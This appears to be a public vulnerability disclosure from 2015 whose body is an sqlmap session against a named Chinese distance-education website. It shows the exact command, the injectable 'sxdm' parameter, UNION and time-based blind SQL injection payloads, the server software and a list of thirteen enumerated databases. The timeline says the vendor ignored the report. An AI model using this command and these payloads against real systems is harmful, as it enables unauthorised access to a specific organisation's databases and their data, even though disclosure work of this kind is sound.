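2015-01-14: Details reported to the vendor; awaiting vendor handling
2015-01-19: The vendor has actively ignored the vulnerability; details disclosed to the public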
RT
[root@Hacker~]# Sqlmap sqlmap -u "http://www1.openedu.com.cn/graduate/cx1.php?sxdm=辽宁电大" -v 1 --dbs
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility t
[*] starting at 14:22:47
[14:22:47] [INFO] resuming back-end DBMS 'microsoft sql server'
[14:22:48] [INFO] testing connection to the target URL
[14:22:48] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://bugs.python.org/issue1602). All u
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: sxdm
    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: sxdm=????' UNION ALL SELECT CHAR(113)+CHAR(121)+CHAR(110)+CHAR(100)+CHAR(113)+CHAR(103)+CHAR(87)+CHAR(99)+CHAR(105)+CHAR(114)
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query - comment)
    Payload: sxdm=????' AND 4873=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys
---
[14:22:49] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 4.3.10
back-end DBMS: Microsoft SQL Server 2005
[14:22:49] [INFO] fetching database names
[14:22:49] [INFO] the SQL query used returns 13 entries
[14:22:49] [INFO] resumed: "distribution"
[14:22:49] [INFO] resumed: "educheck"
[14:22:49] [INFO] resumed: "ggxzx_course"
[14:22:49] [INFO] resumed: "longschool"
[14:22:49] [INFO] resumed: "master"
[14:22:49] [INFO] resumed: "model"
[14:22:49] [INFO] resumed: "msdb"
[14:22:49] [INFO] resumed: "openedu"
[14:22:49] [INFO] resumed: "openlog"
[14:22:49] [INFO] resumed: "opennewtempdb"
[14:22:49] [INFO] resumed: "shdc_Course"
[14:22:49] [INFO] resumed: "tempdb"
[14:22:49] [INFO] resumed: "xzldx_course"
available databases [13]:
[*] distribution
[*] educheck
[*] ggxzx_course
[*] longschool
[*] master
[*] model
[*] msdb
[*] openedu
[*] openlog
[*] opennewtempdb
[*] shdc_Course
[*] tempdb
[*] xzldx_course
[14:22:49] [INFO] fetched data logged to text files under 'C:\Users\ADMINI~1\Desktop\???~1\SQLMAP~1.4\Bin\output\www1.openedu.com.cn'
Severity: No impact (ignored by vendor)
Ignored at: 2015-01-19 12:56
None yet